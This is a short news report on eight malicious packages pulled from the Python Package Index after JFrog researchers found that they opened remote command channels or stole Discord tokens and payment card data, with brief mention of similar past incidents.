The operators of the Python Package Index (PyPI), the official repository for Python components, have removed eight libraries this week that contained malicious code.
Discovered by the JFrog security team, formerly known as VDOO, the eight packages can be grouped into two categories based on the malicious operations they performed. Two of the eight allowed a remote attacker to run malicious commands on a victim’s device by making the infected host connect to an attacker’s IP address on TCP port 9009, and then execute any malicious Python code provided by this server. The other six PyPI packages worked primarily as stealers. Once installed on a developer’s computer, they collected data from the infected host with a focus on general system information, Discord tokens (scraped from predetermined disk locations), and payment card information (extracted from locally installed browsers such as Google, Opera, Brave, and Yandex).
Based on statistics gathered through third-party service Pepy, the JFrog team said the eight libraries were downloaded more than 30,000 before being removed from the PyPI portal. An in-depth
technical report about each library’s technical capabilities is available on the JFrog blog.
This week’s incident is also not that out of the ordinary. Malicious packages make it on the official PyPI repository on a regular basis, along with the official repositories of many other programming languages. For example, security researchers previously discovered malicious PyPI packages that contained a hidden backdoor targeting Linux systems, PyPI packages that opened reverse shells on infected hosts, and PyPI packages that stole SSH and GPG keys. Furthermore, Discord tokens have also been at the center of incidents on the npm (JavaScript) repository at least on two different occasions.
![[correlate]](/data/avatars/m/79/79653.jpg?1556985072){kind=avatar}
![[correlate]](/data/avatars/s/79/79653.jpg?1556985072){kind=avatar}
